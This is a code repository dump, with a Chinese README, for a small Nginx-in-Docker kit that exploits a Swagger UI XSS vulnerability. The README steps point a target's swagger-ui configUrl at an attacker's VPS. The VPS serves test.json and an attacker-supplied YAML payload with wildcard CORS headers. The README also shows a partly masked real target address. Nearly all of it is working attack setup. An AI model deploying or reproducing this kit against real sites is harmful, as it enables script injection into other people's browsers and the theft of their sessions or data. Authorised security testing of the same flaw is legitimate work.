├── 1_20220611204136.png ├── 2_20220611204136.png ├── README.md ├── configuration ├── ssl.conf └── swagger.conf ├── docker-compose.yml └── www ├── test.json └── test.yaml /1_20220611204136.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/coffeehb/nginx_swagger/f968869146d4a4554136646389597c4a46032028/1_20220611204136.png -------------------------------------------------------------------------------- /2_20220611204136.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/coffeehb/nginx_swagger/f968869146d4a4554136646389597c4a46032028/2_20220611204136.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # nginx_swagger 2 | 这个项目主要用于构建一个Nginx服务端,辅助测试Swagger的XSS漏洞。 3 | 4 | ## 使用方法 5 | 6 | **1、修改test.json中VPS IP为你的VPS地址** 7 | 8 | **2、修改test.yaml中的XSS Payload** 9 | 10 | **3、启动Nginx** 11 | 12 | 默认8443端口 13 | docker-compose up -d 14 | 15 | **4、触发漏洞** 16 | http://目标/swagger-ui/index.html?configUrl=https://VPS_IP/test.json 17 | 18 | # 漏洞原理 19 | ![avatar](./1_20220611204136.png) 20 | 21 | # 漏洞触发 22 | 23 | http://1.116.xxx.112:8089/swagger-ui/index.html?configUrl=https://VPS_IP:8443/test.json 24 | 25 | 注意:目标是HTTPS的网站,你的VPS 可能需要配置HTTPS,我这里没有测试了。 26 | 27 | # 漏洞效果 28 | ![avatar](./2_20220611204136.png) 29 | -------------------------------------------------------------------------------- /configuration/ssl.conf: -------------------------------------------------------------------------------- 1 | server { 2 | listen 8444 ssl; 3 | root /usr/share/nginx/html; 4 | server_name console.xxxxx.cn; 5 | ssl_certificate console.xxxxx.cn_bundle.crt; 6 | ssl_certificate_key console.xxxxx.cn.key; 7 | ssl_session_timeout 5m; 8 | ssl_protocols TLSv1.2 TLSv1.3; 9 | ssl_ciphers ECDHE-RSA-AES128-GCM-SHA256:HIGH:!aNULL:!MD5:!RC4:!DHE; 10 | ssl_prefer_server_ciphers on; 11 | location / { 12 | add_header Access-Control-Allow-Origin *; 13 | add_header Access-Control-Allow-Methods 'GET, POST, OPTIONS'; 14 | add_header Access-Control-Allow-Headers 'DNT,X-Mx-ReqToken,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Authorization'; 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /configuration/swagger.conf: -------------------------------------------------------------------------------- 1 | server { 2 | listen 8443; 3 | 4 | root /usr/share/nginx/html; 5 | 6 | index index.html; 7 | 8 | server_name _; 9 | location / { 10 | add_header Access-Control-Allow-Origin *; 11 | add_header Access-Control-Allow-Methods 'GET, POST, OPTIONS'; 12 | add_header Access-Control-Allow-Headers 'DNT,X-Mx-ReqToken,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Authorization'; 13 | } 14 | } 15 | -------------------------------------------------------------------------------- /docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '2' 2 | services: 3 | nginx: 4 | image: vulhub/nginx:1 5 | volumes: 6 | - ./configuration:/etc/nginx/conf.d 7 | - ./www/:/usr/share/nginx/html/ 8 | ports: 9 | - "8443:8443" 10 | -------------------------------------------------------------------------------- /www/test.json: -------------------------------------------------------------------------------- 1 | { 2 | "url": "http://VPS:8443/test.yaml", 3 | "urls": [ 4 | { 5 | "url": "http://VPS:8443/test.yaml", 6 | "name": "Foo" 7 | } 8 | ] 9 | } 10 | --------------------------------------------------------------------------------